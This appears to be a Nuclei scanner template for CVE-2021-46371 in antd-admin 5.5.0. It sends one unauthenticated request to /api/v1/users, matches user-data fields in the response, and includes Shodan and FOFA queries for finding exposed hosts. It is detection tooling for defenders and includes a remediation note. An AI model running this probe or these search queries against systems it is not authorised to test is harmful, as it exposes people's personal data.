id: CVE-2021-46371 info: name: AntD Admin - Sensitive Information Disclosure author: ritikchaddha severity: high description: | AntD Admin has a security vulnerability that stems from Antd-admin 5.5.0 being affected by an incorrect access control vulnerability. Attackers can exploit this vulnerability to gain unauthorized access to some front-end interfaces, resulting in the leakage of sensitive information such as user IDs, names, ages, phone numbers, addresses, and more. impact: | Unauthorized users can access sensitive information, leading to potential data leakage and privacy breaches. remediation: | Update to the latest version of antd-admin that addresses access control issues. reference: - https://github.com/zuiidea/antd-admin/issues/1127 - https://github.com/zuiidea/antd-admin - https://nvd.nist.gov/vuln/detail/CVE-2021-46371 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-306 cve-id: CVE-2021-46371 epss-score: 0.04305 epss-percentile: 0.90127 metadata: verified: true max-request: 1 vendor: zuiidea product: antd-admin fofa-query: 'body="/@@/devScripts.js" && body="//! umi version:" && body="/umi.js"' shodan-query: html:"/umi.js" html:"@@/devScripts.js" tags: cve,cve2021,antdadmin,disclosure http: - method: GET path: - "{{BaseURL}}/api/v1/users" matchers-condition: and matchers: - type: word part: body words: - 'email":' - 'data":[{"id":' - 'phone":"' condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200 # digest: 4a0a00473045022100a0f900b60ffb11ea8d531d618f79d82c9a7752d2fbaa9cd28615406b081f4a4702202f1cbca0e6cd590a1c61b8c7055bf9e895a243060a43224cc3ee0fda8fc9bda3:922c64590222798bb761d5b6d8e72950